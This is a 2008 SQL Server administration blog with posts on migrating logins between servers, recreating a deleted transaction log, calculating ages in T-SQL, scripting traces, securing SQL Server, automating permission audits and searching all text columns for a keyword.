
Tuesday, November 18, 2008

Copying SQL Server logins from one server to another server

On the old server, copy the following Capture_Logins.sql script to the local hard disk.
/* Capture_Logins.sql */
USE master
GO
IF OBJECT_ID ('sp_hexadecimal') IS NOT NULL
DROP PROCEDURE sp_hexadecimal
GO
CREATE PROCEDURE sp_hexadecimal
@binvalue varbinary(256),
@hexvalue varchar(256) OUTPUT
AS
DECLARE @charvalue varchar(256)
DECLARE @i int
DECLARE @length int
DECLARE @hexstring char(16)
SELECT @charvalue = '0x'
SELECT @i = 1
SELECT @length = DATALENGTH (@binvalue)
SELECT @hexstring = '0123456789ABCDEF'
WHILE (@i <= @length)
BEGIN
DECLARE @tempint int
DECLARE @firstint int
DECLARE @secondint int
SELECT @tempint = CONVERT(int, SUBSTRING(@binvalue,@i,1))
SELECT @firstint = FLOOR(@tempint/16)
SELECT @secondint = @tempint - (@firstint*16)
SELECT @charvalue = @charvalue +
SUBSTRING(@hexstring, @firstint+1, 1) +
SUBSTRING(@hexstring, @secondint+1, 1)
SELECT @i = @i + 1
END
SELECT @hexvalue = @charvalue
GO
IF OBJECT_ID ('sp_help_revlogin') IS NOT NULL
DROP PROCEDURE sp_help_revlogin
GO
CREATE PROCEDURE sp_help_revlogin @login_name sysname = NULL AS
DECLARE @name sysname
DECLARE @xstatus int
DECLARE @binpwd varbinary (256)
DECLARE @txtpwd sysname
DECLARE @tmpstr varchar (256)
DECLARE @SID_varbinary varbinary(85)
DECLARE @SID_string varchar(256)
IF (@login_name IS NULL)
DECLARE login_curs CURSOR FOR
SELECT sid, name, xstatus, password FROM master..sysxlogins
WHERE srvid IS NULL AND name <> 'sa'
ELSE
DECLARE login_curs CURSOR FOR
SELECT sid, name, xstatus, password FROM master..sysxlogins
WHERE srvid IS NULL AND name = @login_name
OPEN login_curs
FETCH NEXT FROM login_curs INTO @SID_varbinary, @name, @xstatus, @binpwd
IF (@@fetch_status = -1)
BEGIN
PRINT 'No login(s) found.'
CLOSE login_curs
DEALLOCATE login_curs
RETURN -1
END
SET @tmpstr = '/* sp_help_revlogin script '
PRINT @tmpstr
SET @tmpstr = '** Generated '
+ CONVERT (varchar, GETDATE()) + ' on ' + @@SERVERNAME + ' */'
PRINT @tmpstr
PRINT ''
PRINT 'DECLARE @pwd sysname'
WHILE (@@fetch_status <> -1)
BEGIN
IF (@@fetch_status <> -2)
BEGIN
PRINT ''
SET @tmpstr = '-- Login: ' + @name
PRINT @tmpstr
IF (@xstatus & 4) = 4
BEGIN -- NT authenticated account/group
IF (@xstatus & 1) = 1
BEGIN -- NT login is denied access
SET @tmpstr = 'EXEC master..sp_denylogin ''' + @name + ''''
PRINT @tmpstr
END
ELSE BEGIN -- NT login has access
SET @tmpstr = 'EXEC master..sp_grantlogin ''' + @name + ''''
PRINT @tmpstr
END
END
ELSE BEGIN -- SQL Server authentication
IF (@binpwd IS NOT NULL)
BEGIN -- Non-null password
EXEC sp_hexadecimal @binpwd, @txtpwd OUT
IF (@xstatus & 2048) = 2048
SET @tmpstr = 'SET @pwd = CONVERT (varchar(256), ' + @txtpwd + ')'
ELSE
SET @tmpstr = 'SET @pwd = CONVERT (varbinary(256), ' + @txtpwd + ')'
PRINT @tmpstr
EXEC sp_hexadecimal @SID_varbinary,@SID_string OUT
SET @tmpstr = 'EXEC master..sp_addlogin ''' + @name + ''
+ ''', @pwd, @sid = ' + @SID_string + ', @encryptopt = '
END
ELSE BEGIN
-- Null password
EXEC sp_hexadecimal @SID_varbinary,@SID_string OUT
SET @tmpstr = 'EXEC master..sp_addlogin ''' + @name + ''
+ ''', NULL, @sid = ' + @SID_string + ', @encryptopt = '
END
IF (@xstatus & 2048) = 2048
-- login upgraded from 6.5
SET @tmpstr = @tmpstr + '''skip_encryption_old'''
ELSE
SET @tmpstr = @tmpstr + '''skip_encryption'''
PRINT @tmpstr
END
END
FETCH NEXT FROM login_curs INTO @SID_varbinary, @name, @xstatus, @binpwd
END
CLOSE login_curs
DEALLOCATE login_curs
RETURN 0
GO
IF OBJECT_ID ('seeMigrateSQLLogins') IS NOT NULL
DROP PROCEDURE seeMigrateSQLLogins
GO
create procedure seeMigrateSQLLogins @login_name sysname = NULL
as
declare
@name char(50),
@binpwd varbinary (256),
@txtpwd sysname,
@tmpstr varchar (256),
@SID_varbinary varbinary(85),
@SID_string varchar(256),
@Is_Policy bit,
@Is_Exp bit,
@type char(1),
@Pol char(3),
@Exp char(3)
set nocount on
create table #logins (
[name] nvarchar(128) NOT NULL,
[sid] varbinary(85) NOT NULL,
[type] char(1) NOT NULL,
[is_policy_checked] bit default 0,
[is_expiration_checked] bit default 0,
[password_hash] varbinary(256) )
insert #logins (name, sid, type)
select name, sid, type from sys.server_principals where
(type_desc = 'SQL_LOGIN' or type_desc = 'WINDOWS_LOGIN') and name <> 'sa' and name <> 'NT AUTHORITY\SYSTEM'
update a set a.is_policy_checked = b.is_policy_checked, a.is_expiration_checked = b.is_expiration_checked, a.password_hash = b.password_hash
from #logins a, sys.sql_Logins b
where a.sid = b.sid
set nocount off
IF (@login_name IS NULL) --Not a single user, get the list
DECLARE seelogin_curs CURSOR FOR
SELECT name, sid, password_hash, type, is_policy_checked, is_expiration_checked FROM #logins
WHERE name <> 'sa'
ELSE
DECLARE seelogin_curs CURSOR FOR
SELECT name, sid, password_hash, type, is_policy_checked, is_expiration_checked FROM #logins
WHERE name = @login_name
OPEN seelogin_curs
FETCH NEXT FROM seelogin_curs INTO @name, @SID_varbinary, @binpwd, @type, @Is_Policy, @Is_Exp
IF (@@fetch_status = -1)
BEGIN
PRINT 'No login(s) found.'
CLOSE seelogin_curs
DEALLOCATE seelogin_curs
END
SET @tmpstr = '/* seeMigrateSQLLogins - For SQL Server 2005 Only '
PRINT @tmpstr
SET @tmpstr = '** Generated '
+ CONVERT (varchar, GETDATE()) + ' on ' + @@SERVERNAME + ' */'
PRINT @tmpstr
PRINT ''
WHILE (@@fetch_status <> -1)
BEGIN
IF @type = 'S'
BEGIN
PRINT '/* SQL Login ******************/'
EXEC sp_hexadecimal @binpwd, @txtpwd OUT
EXEC sp_hexadecimal @SID_varbinary, @SID_string OUT
IF @Is_Policy = 1 Begin set @Pol = 'ON' End ELSE Begin set @Pol = 'OFF' END
IF @Is_Exp = 1 Begin set @Exp = 'ON' End ELSE Begin set @Exp = 'OFF' END
SET @tmpstr = 'Create Login [' + rtrim(@name) + '] WITH PASSWORD = ' + @txtpwd + ' hashed, sid = ' + @SID_string + ', CHECK_POLICY = ' + @Pol + ', CHECK_EXPIRATION = ' + @Exp
PRINT @tmpstr
PRINT ''
END
Else
BEGIN
PRINT '/* SQL Login ******************/'
EXEC sp_hexadecimal @SID_varbinary, @SID_string OUT
SET @tmpstr = 'Create Login [' + rtrim(@name) + '] FROM WINDOWS; '
PRINT @tmpstr
PRINT ''
END
FETCH NEXT FROM seelogin_curs INTO @name, @SID_varbinary, @binpwd, @type, @Is_Policy, @Is_Exp
END
CLOSE seelogin_curs
DEALLOCATE seelogin_curs
drop table #logins
GO

declare
@version2005 char(5)
declare
@version2008 char(5)

--Get the current version of SQL Server running
select @version2005 = substring(@@version,29,4)
select @version2008 = substring(@@version,35,4)

if @version2005 = '9.00'
Begin
exec seeMigrateSQLLogins
End
Else if @version2008 = '10.0'
Begin
exec seeMigrateSQLLogins
End
Else
begin
exec sp_help_revlogin
End

IF OBJECT_ID ('sp_hexadecimal') IS NOT NULL
DROP PROCEDURE sp_hexadecimal
GO
IF OBJECT_ID ('sp_help_revlogin') IS NOT NULL
DROP PROCEDURE sp_help_revlogin
GO
IF OBJECT_ID ('seeMigrateSQLLogins') IS NOT NULL
DROP PROCEDURE seeMigrateSQLLogins
GO
/* End Script */
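One caveat about the version check near the end of the script: it parses @@version at fixed character offsets, which is brittle across builds. A sturdier sketch of the same branching, assuming SERVERPROPERTY (available from SQL Server 2000 onward), would be:

declare @ver varchar(20)
-- ProductVersion returns e.g. '9.00.5000.00' or '10.0.6000.29'
set @ver = convert(varchar(20), SERVERPROPERTY('ProductVersion'))
if left(@ver, 2) = '9.' or left(@ver, 3) = '10.'
exec seeMigrateSQLLogins
else
exec sp_help_revlogin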

On the old server, run the Capture_Logins.sql script to capture all SQL Server logins and password information. All SQL Server logins that use the SQL Server installation on the old server will be captured. Follow these steps, based on the SQL Server tools that you use:
· If you use SQL Server Management Studio, follow these steps:
a. Click Start, point to All Programs, point to Microsoft SQL Server 2005, and then click SQL Server Management Studio.
b. In the Connect to Server window, follow these steps:
1. In the Server name box, type the name of the server that is running SQL Server.
2. In the Authentication box, click SQL Authentication.
3. In the Login box, type sa.
4. In the Password box, type the password for the sa user, and then click Connect.
c. Click File, point to Open, and then click File.
d. In the Look In list, click the Capture_Logins.sql script that you copied to the local hard disk in step 1, and then click Open.
e. In the Connect to Database Engine window, follow these steps:
1. In the Server name box, type the name of the old server that is running SQL Server.
2. In the Authentication box, click SQL Authentication.
3. In the Login box, type sa.
4. In the Password box, type the password for the sa user, and then click Connect.
f. Click Query, point to Results to, and then click Results to File.
g. Click Query, and then click Execute.
h. In the Save Results window, follow these steps:
1. In the Save in list, click the location where you want to save the results of the script.
2. In the File name box, type SQLLOGINS.sql, and then click Save.

· If you use Query Analyzer, follow these steps:
a. Click Start, point to All Programs, point to Microsoft SQL Server, and then click Query Analyzer.
b. In the Connect to SQL Server window, follow these steps:
1. In the SQL Server box, type the name of the old server that is running SQL Server.
2. In the Connect using area, click SQL Server Authentication.
3. In the Login name box, type sa.
4. In the Password box, type the password for the sa user, and then click OK.
c. Click File, and then click Open.
d. In the Open Query File window, in the Look In list, click the Capture_Logins.sql script that you copied to the local hard disk of the old server in step 1, and then click Open.
e. Click Query, and then click Results to File.
f. Click Query, and then click Execute.
g. In the Save Results window, follow these steps:
1. In the Save in list, click the location where you want to save the results of the script.
2. In the File name box, type SQLLOGINS.sql, and then click Save.

Monday, July 14, 2008

Repair a Database with a deleted Transaction log

Your network team says, "Hey, this client ran out of disk space, so we deleted the transaction log for the database as it was over 100GB." The problem was that the applications then started failing. I ran into a few hints in BOL and then other hints on the Internet. After all the research, I determined the best option would be to use DBCC CHECKDB with the REPAIR_ALLOW_DATA_LOSS option. BOL stated this option could repair a transaction log. Well, what could be more broken about a transaction log than not having one at all?

Using the following method you can have the Log file recreated.
/* Stop the SQL service,
rename DbLive.mdf to DbBad.mdf.
Start the SQL service and create a fake DbLive db (with log etc.).
Stop the SQL service.
Delete DbLive.mdf.
Rename DbBad.mdf to DbLive.mdf.
Start the SQL service.
Run the following script: */
ALTER DATABASE DbLive SET EMERGENCY
GO
EXEC sp_dboption 'DbLive', 'single user', 'true'
GO
DBCC CHECKDB ('DbLive', REPAIR_ALLOW_DATA_LOSS)
GO
EXEC sp_dboption 'DbLive', 'single user', 'false'
GO
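Once the repair completes, it is worth running a plain consistency check to confirm the database is clean before handing it back to the applications:

DBCC CHECKDB ('DbLive') WITH NO_INFOMSGS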

This should solve the issue.

Monday, June 30, 2008

Calculating the age of an individual

How do you calculate the age of an individual? This can become an extremely hot topic, and the number of solutions provided can be numerous. Before attacking this “controversial” topic, it would help to set some ground rules to be used in designing an aging algorithm.
The most difficult part of this, of course, is figuring out what to do with leap years. When does a person (or object or document, for that matter) born on February 29th become another year older? For the purposes of this short article, I propose that this occurs on February 28th of non-leap years.
Some Basic Date Arithmetic, SQL Style

Before diving into the aging calculation, let’s look at some very simple date arithmetic using SQL Server 2005.


First, let’s see what adding 1 year to February 28, 2008 and February 29, 2008 returns.

declare @date1 datetime,
@date2 datetime
set @date1 = '20080228'
set @date2 = '20080229'
select dateadd(yy, 1, @date1), dateadd(yy, 1, @date2)
Result:
2009-02-28 00:00:00.000 2009-02-28 00:00:00.000


Interesting, adding 1 year to both dates results in the same date. Let’s see what happens when you now add 4 years.
declare @date1 datetime,
@date2 datetime
set @date1 = '20080228'
set @date2 = '20080229'
select dateadd(yy, 4, @date1), dateadd(yy, 4, @date2)
Result:
2012-02-28 00:00:00.000 2012-02-29 00:00:00.000


Now that is interesting: the two results aren’t the same. This is what would be expected, since 2012 is a leap year.
Now, let’s look at DATEDIFF and see how it works a little.
declare @date1 datetime,
@date2 datetime
set @date1 = '20080229'
set @date2 = '20090228'
select datediff(yy, @date1, @date2)
Result: 1

But wait, what is the result of the following?
declare @date1 datetime,
@date2 datetime
set @date1 = '20081231'
set @date2 = '20090101'
select datediff(yy, @date1, @date2)
Result: 1

Wait! That isn’t right; there isn’t a year between those two dates, so something must be wrong. As you can see, the DATEDIFF function returned the difference between the year values of the two dates, not the actual number of years between the two dates.
We can use this information to create a simple algorithm:
Age = datediff(yy, date_of_birth, Today)
- (if Today < dateadd(yy, datediff(yy, date_of_birth, Today), date_of_birth)
then 1 else 0)
Or, to put it into T-SQL:
declare @dob datetime,
@age int,
@day datetime
set @day = '2008-02-28'
set @dob = '2007-03-01'
set @age = datediff(yy, @dob, @day) -
case
when @day < dateadd(yy, datediff(yy, @dob, @day), @dob)
then 1
else 0
end
select @age
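Result: 0

That matches the ground rules: on February 28, 2008, a person born March 1, 2007 has not yet reached their first birthday. Moving @day to the birthday itself flips the answer:

declare @dob datetime,
@age int,
@day datetime
set @day = '2008-03-01'
set @dob = '2007-03-01'
set @age = datediff(yy, @dob, @day) -
case
when @day < dateadd(yy, datediff(yy, @dob, @day), @dob)
then 1
else 0
end
select @age
Result: 1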

Conclusion
This is just one method to use to calculate the age of a person in code. There are numerous other methods that can also be used. All I can suggest is to use the method that works best for you in your situation.

Thursday, June 19, 2008

Scripting Traces for SQL 2005

I wrote this with the assumption that you will be running traces around job steps, but you can adapt this for other situations. I used the default traces for both SQL and AS traces, but removed most of the Events from both trace definitions in this write-up for brevity; you can generate the full definitions from Profiler by following the steps below. I have sections for SQL Server and Analysis Services.

SQL Trace

1. Create the Trace you want in SQL Profiler, on a SQL connection, setting a Trace Name (I used 'OLAP Error SQL Data'), Save To File with a file name and a file size large enough to hold the data in a single file (I used 32MB), and the Events / Data fields you want to trace. Run the Trace.

2. Stop the Trace - we don't actually want to collect anything at this point.

3. Export the trace definition - select "File > Export > Script Trace Definition > For SQL Server 2005...". Export the definition to a .SQL file of your choice.

4. Close Profiler; we're done with it at this point. In the SQL job with the step you want to trace, you're going to add a couple of steps before the step you want to trace...

5. Add the following code to a T-SQL job step, named 'Delete SQL Trace File', before the step you want to trace (this step is just to make sure there isn't a file from a previous run, just in case):
DECLARE @OS_Cmd VARCHAR(1024)
SELECT @OS_Cmd = 'DEL /Q /F "C:\Trace Files\OLAP Error SQL Data.trc"'
EXECUTE master.dbo.xp_cmdshell @OS_Cmd
NOTE - you will get an error code 12 from the sp_trace_create call in the next step if the output file already exists.


6. Add the code from the SQL file you just created to a T-SQL job step, named 'Start SQL Trace', immediately after the 'Delete SQL Trace File' step. Replace the literal 'InsertFileNameHere' with the destination you want for the trace file (don't add .trc to the end of the file name - it will automatically get added for you). It should look like this:

-- Create a Queue
declare @rc int
declare @TraceID int
declare @maxfilesize bigint
set @maxfilesize = 32
-- Please replace the text InsertFileNameHere, with an appropriate
--filename prefixed by a path, e.g., c:\MyFolder\MyTrace. The .trc extension
--will be appended to the filename automatically. If you are writing from
-- remote server to local drive, please use UNC path and make sure server has
-- write access to your network share
exec @rc = sp_trace_create @TraceID output, 0, N'C:\Trace Files\OLAP Error SQL Data', @maxfilesize, NULL
if (@rc != 0) goto error
-- Client side File and Table cannot be scripted
-- Set the events
declare @on bit
set @on = 1
exec sp_trace_setevent @TraceID, 14, 1, @on
exec sp_trace_setevent @TraceID, 14, 9, @on
exec sp_trace_setevent @TraceID, 14, 6, @on
exec sp_trace_setevent @TraceID, 14, 10, @on
exec sp_trace_setevent @TraceID, 14, 14, @on
exec sp_trace_setevent @TraceID, 14, 11, @on
exec sp_trace_setevent @TraceID, 14, 12, @on
-- Set the Filters
declare @intfilter int
declare @bigintfilter bigint
exec sp_trace_setfilter @TraceID, 10, 0, 7, N'SQL Server Profiler - 1745445d-46a5-4050-9922-16caf3851690'
-- Set the trace status to start
exec sp_trace_setstatus @TraceID, 1
-- display trace id for future references
select
TraceID=@TraceID
goto finish
error: select
ErrorCode=@rc
finish:
Now you're going to add a couple of steps after the step you want to trace...

7. You need to stop the trace. Add this code to a T-SQL step named 'Stop SQL Trace'. Note that the file name in the WHERE clause must match the file name you specified above in the 'Start SQL Trace' step, with '.trc' appended to the end:
DECLARE @TraceID INT
SELECT @TraceID = TraceID FROM ::fn_trace_getinfo(0)
WHERE CAST([value] AS VARCHAR(256)) = 'C:\Trace Files\OLAP Error SQL Data.trc'
IF @TraceID IS NOT NULL

BEGIN
PRINT 'Closing Trace ID ' + CAST (@TraceID AS VARCHAR(5))
EXEC sp_trace_setstatus @TraceID, 0

EXEC sp_trace_setstatus @TraceID, 2
END
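Once the trace is stopped, you can pull the captured events into a table for analysis. A minimal sketch using fn_trace_gettable and the file name from the steps above (the destination table name is arbitrary):

SELECT * INTO TraceResults
FROM ::fn_trace_gettable('C:\Trace Files\OLAP Error SQL Data.trc', DEFAULT)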

10 Steps to Secure SQL Server

1. KEEP SYSTEMS UP TO DATE ON SERVICE PACKS, PATCHES, AND NEW VERSIONS OF THE OS AND SQL SERVER.
Tools to help with this: Idera SQLsecure is a tool for assessing security across your SQL Servers. SQLsecure collects SQL Server version number and service pack as part of the overall security assessment it performs. The version number returned by SQLsecure will also reflect the latest patches applied, so you can determine which servers are out of date.

2. ENFORCE STANDARDS FOR SECURE PASSWORDS.
Tools to help with this: If you are using SQL Server 2005, use the built-in security options to enforce password complexity standards. For previous versions of SQL Server, there are many publicly available scripts you can use to identify accounts with weak or non-existent passwords.
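As a sketch of the SQL Server 2005 built-in options (the login name and password here are placeholders):

CREATE LOGIN AppUser
WITH PASSWORD = 'CHANGE_ME_Str0ng!',
CHECK_POLICY = ON, -- enforce Windows password complexity rules
CHECK_EXPIRATION = ON -- enforce Windows password expiration
GO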

3. SECURE THE FULL ENVIRONMENT, INCLUDING THE OS AND NETWORK
Tools to help with this: Microsoft has many documents and knowledge base articles that provide more detail and best practices on how to ensure server and application security.

4. ENSURE APPROPRIATE SQL SERVER SETUP
Tools to help with this: Idera SQLsecure checks most of these settings across your SQL Servers and reports back where you have potential security concerns.

5. REGULARLY ASSESS WHO CAN ACCESS YOUR SQL SERVERS AND TAKE ACTION TO LIMIT ACCESS.
Tools to help with this: Idera SQLsecure can make this task a whole lot easier for you. SQLsecure automatically generates a complete list of all users with access to your SQL Server, across Windows, Active Directory, and SQL Server, including users that have access as a result of group membership.

6. ASSESS WHAT ACTIONS USERS CAN PERFORM ON WHAT OBJECTS
Tools to help with this: Accurately assessing effective permissions on SQL Server objects is really, really hard to do manually. Idera SQLsecure can perform this time-consuming task for you. SQLsecure calculates both effective (derived) and assigned permissions for all users, on any database object, making it much easier to ensure that users have appropriate access rights.

7. KEEP AN AUDIT TRAIL OF DATABASE ACTIVITY.
Tools to help with this: SQL Server does provide native C2 auditing to help with gathering this information. However, C2 auditing can be very resource intensive and does not provide fine-grained controls to let you specify what you want to collect. You may instead want to use a 3rd party auditing tool, such as Idera SQL compliance manager. SQL compliance manager provides customizable, low-impact auditing, alerting and reporting on virtually all activity across multiple SQL servers.
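If you do want to evaluate the native route first, C2 auditing is switched on through sp_configure; note that it audits everything and the instance must be restarted before it takes effect:

EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'c2 audit mode', 1
RECONFIGURE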

8. AUDIT THE ACTIONS OF ADMIN USERS ON YOUR SQL SERVERS
Tools to help with this: The native SQL Server C2 auditing can also be used for this purpose, however, there is no way to ensure an immutable trail of audit data with the native tools. So, what’s to stop an admin user from deleting the audit trail after making off with your customer list? A better solution is to invest in a 3rd party tool such as SQL compliance manager which can audit ALL admin user activity, and protect the audit trail from tampering by anyone, even admin users.

9. SECURE AND AUDIT THE APPLICATIONS THAT ACCESS YOUR SQL SERVER DATABASES
Tools to help with this: Idera SQL compliance manager will track the activity of any application within a targeted database. And, alerts can be configured to watch for and provide immediate notification of questionable behavior, such as a business application accessing a database it shouldn’t.

10. ENSURE PROPER DATABASE BACKUPS, AND SECURE YOUR BACKUPS
Tools to help with this: While SQL Server does give you the ability to back up your databases, it does not include the ability to encrypt the backups, or to compress them to help save space and reduce backup time. Idera SQLsafe provides a high-performance backup solution which includes encryption and compression. SQLsafe also lets you create backup policies with exception reporting to notify you of any backups that failed to run as scheduled.

Wednesday, June 18, 2008

Automate Audit Requests

Periodically an internal auditor would stop by my desk and ask me to show them all the users and permissions on a particular database. This is easily gathered, and most of us know how to do this. I produce this list and send it on to the requestor. The next question is ‘What has changed?’. I do not have this information, and have to tell them I do not know. So, after a couple of iterations of this (I will not admit how many) I finally devised a simple way to store this information so I could adequately respond to that question.

A snapshot of the user information is gathered from time to time and stored into a history table. The next time a request comes in, I can compare the current values to the historical ones. This had become tedious, as it usually involved some spreadsheets or query results and manually reviewing the data, looking for new records, changed records and so on. When I would produce these two sets of data (current and one historical snapshot) and give the data back to the auditor, they were initially happy, until they realized all the time that would be involved to perform an adequate review of the two sets of data. The next question would invariably be: is there a way to automate this? There is always a way to automate anything, I would respond, and skulk back to my DBA hole and pound out some more code. After more review of the results I produced, and even more back and forth between me and the auditor, we finally decided which fields we needed to see, the differences we should show, etc. I will now try to explain the system that we devised to assist us in this simple, yet complex endeavor.

System

We basically want to know what the users looked like at a point in time, compare it to the current state of the users, and show differences. Differences are defined as: new records, changed records, removed records and old records. We want to be able to dynamically include any number of new and existing servers into this system, though we started with a single server. We want to be able to display these results for a period of time, and allow reporting to occur based on the results. Since we already have a monitoring server set up, this was the perfect place to locate this system. We already use linked servers to connect to and monitor all our remote servers, so we will continue in this vein for this system. Justifications can be read in other articles I’ve written about monitoring with linked servers.

A configuration table indicates which servers we will be monitoring. Some stored procedures will use dynamic SQL to cycle thru the config list of servers and call them to gather data, stage the data, and then do comparisons against this data. The resulting data can then be reported on. That’s the high-level description. I will now go through all the objects in more detail.

Tables

DatabaseRolesConfig
This table will contain a ServerName and an Enabled flag. This allows us to set up multiple servers to be monitored, and enable and disable them at whim. The fields for this table are as follows:

ServerName sysname not null,
Enabled bit not null default 0

DatabaseRolesStaging
This table will allow us to store data we have pulled down from all the remote servers. Once staged, we can query it and process it to our desires. The fields in this table are as follows:
Type sysname null default '',
ServerName sysname null default '',
DBName sysname null default '',
LoginName sysname null default '',
UserName sysname null default '',
db_owner varchar(3) null default '',
db_accessadmin varchar(3) null default '',
db_securityadmin varchar(3) null default '',
db_ddladmin varchar(3) null default '',
db_datareader varchar(3) null default '',
db_datawriter varchar(3) null default '',
db_denydatareader varchar(3) null default '',
db_denydatawriter varchar(3) null default '',
denylogin int null default '',
hasaccess int null default '',
isntname int null default '',
isntgroup int null default '',
isntuser int null default '',
sysadmin int null default '',
securityadmin int null default '',
serveradmin int null default '',
setupadmin int null default '',
processadmin int null default '',
diskadmin int null default '',
dbcreator int null default '',
bulkadmin int null default ''

All the fields have a default of blank, for reporting purposes. Not all fields in every row will have a value, and this eliminates the display of null values in the report. This is just a simple step I chose to make life easy.
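For concreteness, here is a sketch of the DatabaseRolesConfig table from the field list above (constraint names and any extras omitted):

CREATE TABLE DatabaseRolesConfig (
ServerName sysname NOT NULL,
Enabled bit NOT NULL DEFAULT 0
)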

DatabaseRolesHistory
This table is identical to the staging table, and will hold the processed data from the last execution for comparison to the next execution.
DatabaseRolesArchive
This table is identical to the staging table, except that it has an added Identity field for uniqueness, and a [Date] field that will contain the date of the archived data. This will be a holding area for all the data processed and displayed from past executions. The extra fields are as follows:

ID integer not NULL IDENTITY(1,1),
[Date] datetime not null default getdate(),

DatabaseRolesDisplay
This table is similar to the above two tables. We’ve added an Identity field for uniqueness and a Version field to keep track of the version (Type). This will be the table that contains the processed data, grouped by type, and cleaned up. We will report from this table, as it will hold the result set after processing. The fields added to this table are as follows:

ID integer not NULL IDENTITY(1,1),
Version VARCHAR(8) not null,

Stored Procedures
sp_GetDBRoles
This procedure is passed a ServerName, DatabaseName and a UserName. The last two params were never implemented, but the ServerName determines which server we will be pulling data from. We use dynamic SQL to pull information from syslogins on the remote server, and then store it in the DatabaseRolesStaging table, with a ServerName and Type included. Then we create a cursor that will cycle thru each database in sysdatabases, except a few. Inside the cursor, we dynamically call SQL that pulls more data from sysmembers, sysusers and syslogins, retrieving those users that have roles set; this data is stored in the staging table as well. We next use dynamic SQL to pull more data from sysusers and syslogins, retrieving those users that do not have roles set. This data is also stored in the staging table.

sp_GetAllDBRoles
This will cycle thru the config table DatabaseRolesConfig and call the sp_GetDBRoles proc for each server that is enabled to be processed.

sp_ProduceDatabaseRolesResults
Since we have previously gathered records into the DatabaseRolesStaging table, we can now compare these results to some other tables of historical data. We have a history table called DatabaseRolesHistory that contains the last set of data we gathered about users.

1. We select the new values, and insert them into a memory table @DatabaseRolesStaging with a flag indicating they are ‘new’.
2. We select the old values that have changed, and insert them into the table @DatabaseRolesStaging with a flag indicating they are ‘old’.
3. We update the ‘new’ values that have changed. We determine this if there is a new record, and an old with some of the same values (Servername, DBName, UserName and LoginName). These are updated in the table @DatabaseRolesStaging with a flag indicating they are ‘changed’.
4. We find the records that were removed from the DatabaseRolesHistory table, compared to the DatabaseRolesStaging table. These records are inserted into the table @DatabaseRolesStaging with a flag indicating they are ‘removed’.
5. Records that were simply altered are removed from the memory table @DatabaseRolesStaging.
This resulting data is now labeled and ready to display to the requestor. We process the data from the @DatabaseRolesStaging table and order it with ‘Old’ and ‘Changed’ first, then the ‘Removed’ records, followed by the ‘New’ records. This just helps in the viewing of the data, with the important ones first. The resulting data is dumped into a real table called DatabaseRolesDisplay, and will live there until the next execution of this process. This allows me to reselect from this data when needed between executions. I used to have it simply returned once as part of the proc call, but would tend to need to look at the data subsequently; this solves that need.
sp_ProcessDatabaseRoles
This stored procedure takes a ServerName as a parameter. If you use this option, it will call the procedure sp_GetDBRoles for just that ServerName. If you leave the ServerName blank, it will call sp_GetAllDBRoles and process all enabled ServerNames from the config table. This proc will then get the user data into the staging table as described above. It will then call the sp_ProduceDatabaseRolesResults procedure, which will process the data in the staging table, comparing it to the historical data. Then the data in the history table will be pumped into the archive table, the history table will be truncated, and the current staging data will be pumped into the history table, there to await the next execution.

This is the gem of the system, taking all other parts into account and doing it all for you. It can be called singly when the auditor requests it, or you can schedule it to run as a job and simply query the resulting data in the DatabaseRolesDisplay table. There are many options you now have to follow, depending on your own needs.

This system will allow you to gather user information, stage it, and store it historically, allowing you the chance to see back into the past at a snapshot of what once was. No more will you be stymied by auditors or others with the questions of what users we have in the system, and how they compare to a year ago. You have the data, you are empowered, you are the DBA in control and informed. I hope that this system will help you gather the needed data and have it on hand to help out with your user reviews.

Tuesday, May 13, 2008

How to search all columns of all tables in a database for a keyword?

While browsing the SQL Server newsgroups, every once in a while I see a request for a script that can search all the columns of all the tables in a given database for a specific keyword. I had no such script handy at the time, so we ended up searching manually. That's when I really felt the need for such a script and came up with this stored procedure, "SearchAllTables". It accepts a search string as an input parameter, and searches all char, varchar, nchar and nvarchar columns of all tables (only user-created tables; system tables are excluded) owned by all users in the current database. Feel free to extend this procedure to search other datatypes. The output of this stored procedure contains two columns:
1) The table name and column name in which the search string was found
2) The actual content/value of the column (only the first 3630 characters are displayed)

Here's a word of caution before you go ahead and run this procedure: though it is quite quick on smaller databases, it could take hours to complete on a large database with many character columns and a huge number of rows. So, if you are trying to run it on a large database, be prepared to wait (I did use the locking hint NOLOCK to reduce any locking). It is more efficient to use the Full-Text Search feature for free-text searching, but it doesn't make sense for this type of ad hoc requirement. Create this procedure in the required database, and here is how you run it:

--To search all columns of all tables in the Pubs database for the keyword "Computer"
EXEC SearchAllTables 'Computer'
GO

Here is the complete stored procedure code:
CREATE PROC SearchAllTables
(
@SearchStr nvarchar(100)
)
AS
BEGIN
CREATE TABLE #Results (ColumnName nvarchar(370), ColumnValue nvarchar(3630))
SET NOCOUNT ON
DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110)
SET @TableName = ''
SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')
WHILE @TableName IS NOT NULL
BEGIN
SET @ColumnName = ''
SET @TableName =
(
SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE'
AND QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @TableName
AND OBJECTPROPERTY(
OBJECT_ID(
QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)
), 'IsMSShipped'
) = 0
)
WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)
BEGIN
SET @ColumnName =
(
SELECT MIN(QUOTENAME(COLUMN_NAME))
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA = PARSENAME(@TableName, 2)
AND TABLE_NAME = PARSENAME(@TableName, 1)
AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')
AND QUOTENAME(COLUMN_NAME) > @ColumnName
)

IF @ColumnName IS NOT NULL
BEGIN
INSERT INTO #Results
EXEC
(
'SELECT ''' + @TableName + '.' + @ColumnName + ''', LEFT(' + @ColumnName + ', 3630)
FROM ' + @TableName + ' (NOLOCK) ' +
' WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2
)
END
END
END
SELECT ColumnName, ColumnValue FROM #Results
END

Monday, May 12, 2008

One stop shop for SQL tools

A must-have for any DB admin.
SQL Toolbelt™ from Redgate tools. ALL our SQL Server tools in a single installer
Eleven acclaimed tools that burn through tedious SQL chores
Completely intuitive, easy to use, they go to work for you straight away
Fast, accurate and relentlessly tested so you can save time
